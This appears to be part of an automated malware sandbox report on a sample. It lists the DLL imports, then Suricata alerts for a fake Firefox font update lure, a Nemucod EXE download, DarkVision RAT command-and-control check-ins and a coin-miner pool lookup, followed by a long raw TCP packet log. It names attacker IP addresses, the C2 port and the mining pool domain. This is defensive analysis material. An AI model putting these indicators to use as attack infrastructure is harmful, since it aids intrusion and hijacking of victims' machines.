                                                                                                          OLE32.DLLCoInitialize, CoTaskMemFree
                                                                                                          SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                                                                                          USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                                                                          GDI32.DLLGetStockObject
                                                                                                          COMCTL32.DLLInitCommonControlsEx

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-09T07:37:29.980726+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738154.216.20.243443TCP
                                                                                                          2024-12-09T07:37:29.989191+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449739185.157.162.2165200TCP
                                                                                                          2024-12-09T07:37:30.470669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737154.216.20.243443TCP
                                                                                                          2024-12-09T07:37:31.145554+01002022482ET MALWARE JS/Nemucod requesting EXE payload 2016-02-011192.168.2.449737154.216.20.243443TCP
                                                                                                          2024-12-09T07:37:31.426940+01002021954ET MALWARE JS/Nemucod.M.gen downloading EXE payload1154.216.20.243443192.168.2.449737TCP
                                                                                                          2024-12-09T07:37:33.710760+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.449739185.157.162.2165200TCP
                                                                                                          2024-12-09T07:37:35.410820+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449741185.157.162.2165200TCP
                                                                                                          2024-12-09T07:37:36.142909+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.4548921.1.1.153UDP
                                                                                                          2024-12-09T07:37:38.092973+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449744185.157.162.2165200TCP
                                                                                                          2024-12-09T07:37:40.827923+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449745185.157.162.2165200TCP
                                                                                                          2024-12-09T07:37:43.495962+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449746185.157.162.2165200TCP
                                                                                                          2024-12-09T07:37:46.191236+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449747185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:05.335051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740154.216.20.243443TCP
                                                                                                          2024-12-09T07:38:29.876691+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449764154.216.20.243443TCP
                                                                                                          2024-12-09T07:38:41.565655+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449848185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:45.306325+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.449848185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:46.992724+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449863185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:49.693183+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449870185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:52.366437+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449876185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:55.065857+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449883185.157.162.2165200TCP
                                                                                                          2024-12-09T07:38:57.772811+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.449892185.157.162.2165200TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 9, 2024 07:37:03.264318943 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:03.264357090 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:03.264419079 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:03.279232025 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:03.279247999 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:07.934281111 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:07.934410095 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:07.938092947 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:07.938101053 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:07.938350916 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:07.949891090 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:07.995341063 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.605149984 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.605180979 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.605196953 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.605237961 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.605261087 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.605276108 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.605307102 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.724087954 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.724113941 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.724338055 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.724349976 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.724397898 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.800028086 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.800054073 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.800124884 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.800133944 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.800182104 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.888993979 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.889014006 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.889087915 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.889097929 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.889147043 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.921972036 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.921994925 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.922193050 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.922204018 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.922254086 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.943069935 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.943085909 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.943156004 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.943162918 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.943214893 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.996747971 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.996766090 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.996922970 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:08.996932030 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:08.996977091 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.095451117 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.095470905 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.095566988 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.095592976 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.095634937 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.109061003 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.109077930 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.109158993 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.109186888 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.109224081 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.122193098 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.122210979 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.122267008 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.122277021 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.122312069 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.134397984 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.134414911 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.134493113 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.134501934 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.134540081 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.144781113 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.144798994 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.144860983 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.144867897 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.144911051 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.170211077 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.170228004 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.170300961 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.170325041 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.170367002 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.181543112 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.181561947 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.181618929 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.181626081 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.181663990 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.283307076 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.283334017 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.283401012 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.283426046 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.283490896 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.293967962 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.293989897 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.294074059 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.294095993 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.294137955 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.303798914 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.303814888 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.303949118 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.303957939 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.304001093 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.311911106 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.311932087 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.311964035 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.311973095 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.312010050 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.312037945 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.320596933 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.320616007 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.320674896 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.320682049 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.320715904 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.329960108 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.329977036 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.330065012 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.330073118 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.330115080 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.363219976 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.363236904 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.363293886 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.363301992 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.363346100 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.468498945 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.468523026 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.468602896 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.468616962 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.468663931 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.476490974 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.476506948 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.476583004 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.476588964 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.476641893 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.483577013 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.483597040 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.483633995 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.483639002 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.483673096 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.483695984 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.491852999 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.491868973 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.491923094 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.491930008 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.491977930 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.499938965 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.499953985 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.500005007 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.500011921 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.500057936 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.507643938 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.507659912 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.507714987 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.507724047 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.507756948 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.515707970 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.515723944 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.515794039 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.515801907 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.515845060 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.518568039 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.555844069 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.555860996 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.555927038 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.555934906 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.555977106 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.660774946 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.660794020 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.660871983 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.660878897 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.660923958 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.668560028 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.668576002 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.668629885 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.668637991 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.668673038 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.672079086 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.672137976 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.672142982 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.672167063 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.672208071 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.682405949 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.993963957 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.993990898 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:26.994055033 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.994199038 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.994239092 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:26.994285107 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.995843887 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.995856047 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:26.995975971 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.995995045 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.868977070 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:29.980658054 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.980726004 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:29.985352993 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:29.985363960 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.985570908 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.988420963 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.988492966 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:29.989191055 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:30.032015085 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.079329967 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.108510017 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.470489979 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.470669031 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.471802950 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.471811056 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.472057104 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.472893953 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.515336037 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662792921 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662825108 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662832975 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662844896 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.662877083 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.663109064 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.663109064 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.663126945 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.663184881 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.781657934 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.781675100 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.781745911 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.781769991 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.781807899 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.848726988 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.848745108 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.848989964 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.849008083 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.849056005 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.945588112 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.945605993 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.945696115 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.945712090 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.945756912 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.978574038 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.978589058 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.978698015 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:30.978708982 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:30.978754044 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.010188103 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.010204077 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.010288954 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.010304928 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.010350943 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.070868969 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.070895910 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.071012020 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.071024895 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.071074009 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.140767097 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.140779972 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.140897036 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.140908957 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.140944958 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.145601988 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.145627975 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.145643950 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.145740032 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.145760059 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.145823956 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.160907984 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.160923004 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.160989046 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.161003113 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.161046028 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.178467989 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.178483963 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.178654909 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.178663969 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.178708076 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.192404032 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.192420006 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.192595959 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:31.192604065 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:31.192650080 CET49738443192.168.2.4154.216.20.243
